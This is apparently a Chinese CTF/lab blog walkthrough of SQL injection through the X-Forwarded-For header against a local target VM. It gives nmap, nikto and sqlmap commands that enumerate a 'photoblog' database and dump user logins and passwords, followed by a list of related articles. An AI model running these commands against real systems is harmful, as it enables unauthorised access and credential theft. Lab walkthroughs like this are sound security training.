前言

作者简介：不知名白帽，网络安全学习者。

博客主页：https://blog.csdn.net/m0_63127854?type=blog

CTF-专栏：https://blog.csdn.net/m0_63127854/category_11835386.html

网络安全交流社区：https://bbs.csdn.net/forums/angluoanquan

目录

环境配置

信息探测

AWVS漏洞扫描

漏洞利用

扫描数据库

扫描表名

扫描字段值

扫描用户名和密码

---

环境配置

kali 192.168.20.128

靶机 192.168.20.132

链接：https://pan.baidu.com/s/1vUYqkBnWkrfXvdC99nOsSQ 
提取码：4p7w

信息探测

nmap -sV ip

nmap -A -v ip

 nikto -host http://ip 探测敏感信息

AWVS漏洞扫描

链接：https://pan.baidu.com/s/1o_2nXdQOuDFE8jI1uQdPiw 
提取码：jsdx

漏洞利用

扫描数据库

sqlmap -u "http://192.168.20.132" --headers="X-Forwarded-For:*" --dbs --batch

扫描表名

sqlmap -u "http://192.168.20.132" --headers="X-Forwarded-For:*" -D "photoblog" --tables --batch

扫描字段值

sqlmap -u "http://192.168.20.132" --headers="X-Forwarded-For:*" -D "photoblog" -T "users" --columns --batch

扫描用户名和密码

sqlmap -u "http://192.168.20.132" --headers="X-Forwarded-For:*" -D "photoblog" -T "users" -C 'login,password' --dump --batch

CTF-sql注入(X-Forwarded-For)【简单易懂】相关推荐

1. SQL注入详解和简单绕过原理

   1.什么是SQL 结构化查询语言(Structured Query Language)简称SQL SQL使我们有能力访问数据库 2.什么是SQL注入 用户提交的数据可以被数据库解析执行 如果用户随随便 ...

2. [CTF] SQL注入的一些经验总结（未完待续）【更新：2022.11.25】

   文章目录 关于SQL注入的思维导图可以看一下 一.SQL注入介绍 (一)注入流程 (二)MySQL常用函数与参数 二.SQL注入基本知识 1.寻找注入点 分析 判断 2.联合查询注入 (1)什么是联合 ...

3. CG CTF 南邮CTF SQL注入2

   SQL注入2 分析源码 <?php if($_POST[user] && $_POST[pass]) { mysql_connect(SAE_MYSQL_HOST_M . ':' ...

4. SQL注入原理及过程简单介绍

   1.产生SQL注入原因        开发代码的时候没有全面考虑到网络安全性,特别是在用户交互时,没有考虑到用户提交的信息中可能破坏数据库,没有对输入的数据进行合法的过滤.SQL 注入过程目的性是非常 ...

5. CTF SQL注入知识点

   理解常用的登录判断 select * from user where username='admin' and password='123' 数据库元信息 infomation_schema 懂PHP ...

6. linux json 写sql注入,sql注入之AJAX（SQL Injection (AJAX/JSON/jQuery)）

   sql注入之AJAX(SQL Injection (AJAX/JSON/jQuery)) 0x1 网上搜下没有关于ajax的sql注入文章,这里简单写一下抛砖引玉. 原理自己百度,这里简单说下: 通过 ...

7. SQL注入实验，PHP连接数据库，Mysql查看binlog，PreparedStatement，mysqli, PDO

   看到有人说了判断能否sql注入的方法: 简单的在参数后边加一个单引号,就可以快速判断是否可以进行SQL注入,这个百试百灵,如果有漏洞的话,一般会报错. 下面内容参考了这两篇文章 http://blog ...

8. 基于pikachu漏洞平台的 --SQL注入攻击学习与总结

   SQL注入攻击 基础知识 常见注释符号 使用示例 pikachu 漏洞联系平台 -- SQL注入 SQL注入攻击流程 注入点类型 数字型注入(POST) 字符型注入(GET) 搜索型注入 XX型注入 ...

9. Java -- SQL注入

   为什么会产生SQL注入问题 举一个简单的SQL注入攻击的例子: 假如我们有一个users表,里面有两个字段username和password.在我们的java代码中我们初学者都习惯用sql拼接的方式进 ...

10. 批量挖sql注入漏洞

    这是去年我写的一篇文章,眼看着服务器马上到期了,也没有备份,直接复制过来了,也懒得改格式了,适合新手刷洞,将就看吧文章很水,但是很实在. 关于批量挖sql注入,其实很简单,之前我在补天提交漏洞的时候, ...

最新文章

1. ABAP在ALV工具栏显示一个计时器
2. asp.net的资料
3. CCF之地铁修建（100分）
4. [C# 项目实战]: 制作一个备忘录(经典)
5. Linux02进程内存管理
6. Request的getHeader()和getParameter()的区别
7. 史上最大多模态图文数据集发布！
8. python发短信脚本_python脚本发送短信
9. 统计学习方法读书笔记9-朴素贝叶斯习题
10. 山西省计算机商务学校地址,山西计算机等级考试报名地点
11. lanproxy搭建内网穿透
12. python表情换头_教你用Python制作表情包，实现换脸技术！
13. 云防护当道，如何绕过云防护来进行渗透测试
14. 基于JAVA宠物用品交易网站计算机毕业设计源码+系统+lw文档+部署
15. 实时计算 java基础：类的结构之五：内部类
16. OSWE 尾篇 考试的方法论
17. 零基础入门python web 自动化测试_python web自动化测试，入门篇
18. ncut算法matlab程序,Ncut算法的MATLAB代码下载及实现在MATLAB上正常运行
19. 【MQTT】Windows：安装MQTT
20. 第四篇 再读Spring 之BeanDefinition注册

热门文章

1. 3000字分享数据分析的职责、岗位要求、学习重点
2. 来！简单了解一下计算机发展史！
3. python数据录入系统数据库处理导出_Python以太坊区块链交互将数据存入数据库
4. 量子力学的发展，从黑体辐射开始
5. 小猫爬山（dfs剪枝）
6. 脑科学实验-割裂脑研究
7. 安全编程之RAS加密与解密
8. 一种基于机载AI模块的多旋翼无人机的电力巡检报告生成方法
9. 际上导航无人机电力巡检点云密度是多少？
10. (9)3DMAX之复制功能（复制属性、变换复制、阵列工具、间隔工具）